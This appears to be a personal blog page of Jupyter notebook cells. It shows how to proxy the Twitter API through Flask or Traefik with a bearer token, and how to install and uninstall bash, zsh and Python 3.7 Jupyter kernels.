  • Here is a solution using Flask to proxy Tweets API.
In [ ]:
BEARER_TOKEN=''
In [ ]:
curl -H "Authorization: Bearer ${BEARER_TOKEN}" 'https://api.twitter.com/1.1/statuses/user_timeline.json?screen_name=seii_saintway&count=20'
In [ ]:
curl -H "Authorization: Bearer ${BEARER_TOKEN}" 'https://api.twitter.com/2/users/807092313298112512/tweets?tweet.fields=created_at&max_results=10'
  • My solution using Traefik to proxy Tweets API
In [ ]:
cat << EOF | sudo tee /opt/tljh/state/dynamic/tweets.toml > /dev/null

[frontends.tweets]
backend = "tweets"

[frontends.tweets.routes.r1]
rule = "PathPrefix:/tweets/"

[frontends.tweets.routes.r2]
rule = "ReplacePath:/2/users/807092313298112512/tweets"

[frontends.tweets.headers.customrequestheaders]
Authorization = "Bearer ${BEARER_TOKEN}"

[frontends.tweets.headers.customresponseheaders]
Access-Control-Allow-Origin = "*"

[backends.tweets.servers.s1]
url = "https://api.twitter.com"
weight = 1

EOF
In [ ]:
sudo systemctl restart traefik
In [ ]:
curl 'https://jhub.name/tweets/?tweet.fields=created_at&max_results=10'
Read More

2021-10-27
Try to Reinstall Zsh Kernel

A Jupyter Kernel for Bash

https://github.com/takluyver/bash_kernel

In [ ]:
%%bash
pip3 install bash_kernel
In [ ]:
%%bash
python3 -m bash_kernel.install

A Jupyter Kernel for Z Shell

https://github.com/dan-oak/zsh-jupyter-kernel

In [ ]:
%%bash
launchctl stop com.quantum.jupyter-lab
In [ ]:
%%bash
python3 -m pip install notebook zsh_jupyter_kernel

python3 -m zsh_jupyter_kernel.install --sys-prefix
In [ ]:
%%bash
python3 -m zsh_jupyter_kernel.install
In [ ]:
%%bash
launchctl start com.quantum.jupyter-lab

How to uninstall Zsh Jupyter Kernel?

In [ ]:
import zsh_jupyter_kernel
print(zsh_jupyter_kernel.__file__)

/usr/local/lib/python3.9/site-packages/zsh_jupyter_kernel/__init__.py
In [ ]:
%%bash
ls -lah /usr/local/lib/python3.9/site-packages/zsh_jupyter_kernel
In [ ]:
%%bash
cat /usr/local/lib/python3.9/site-packages/zsh_jupyter_kernel/install.py

Try to uninstall Zsh Jupyter Kernel

In [ ]:
%%bash
launchctl stop com.quantum.jupyter-lab
In [ ]:
%%bash
python3 -m pip uninstall zsh_jupyter_kernel
In [ ]:
%%bash
jupyter kernelspec list
In [ ]:
%%bash
jupyter kernelspec uninstall zsh
In [ ]:
%%bash
launchctl start com.quantum.jupyter-lab

A Jupyter Kernel for Python 3.7

In [ ]:
%%bash
cd ~ && virtualenv -p $(which python3.7) py37
source ~/py37/bin/activate
ipython kernel install --user --name py37 --display-name 'Python 3.7'
In [ ]:
%%bash
jupyter kernelspec uninstall py37
Read More